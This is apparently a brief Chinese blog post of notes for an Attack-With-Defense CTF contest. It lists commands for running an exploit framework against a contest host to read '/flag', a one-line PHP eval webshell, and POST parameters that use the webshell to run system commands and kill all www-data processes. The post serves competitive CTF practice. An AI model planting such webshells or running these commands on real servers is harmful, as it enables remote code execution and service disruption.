AWD笔记
2018-09-09 本文已影响0人
N0rmal
AWD笔记
一、框架攻击脚本运行
测试,攻击npc
python run.py -m cqhk_exp2 -l 1 -t ctf.momomoxiaoxi.com:8815
正式攻击
python run.py -m cqhk_exp2 -c 'cat /flag' -c get_flag
二、杀不死马
-
通用方法
chmod 755 css cd css rm .d0xxxxxx.php & mkdir .doxxxxxx.php chmod 777 ../css
- 自己种马杀www-data进程之后杀马
ps -ef|grep 'www-data' | awk '{print $2}'| xargs kill -9
杀不死马方式:
写入webshell.php
<?php
@eval($_REQUEST['aa']);
?>
hackbar post
http://ctf.momomoxiaoxi.com:8802/css/webshell.php
post参数:
测试:
aa=system("ls");
正式:
aa=system("ps -ef|grep 'www-data' | awk '{print $2}'| xargs kill -9");
三、启动apache
/usr/sbin/apache2 -k start
四、工具
postman,类似hackbar
mamp , mac版php+mysql管理工具
transmit,mac版ftp工具
burpsuite,插件Reissue Request Scripter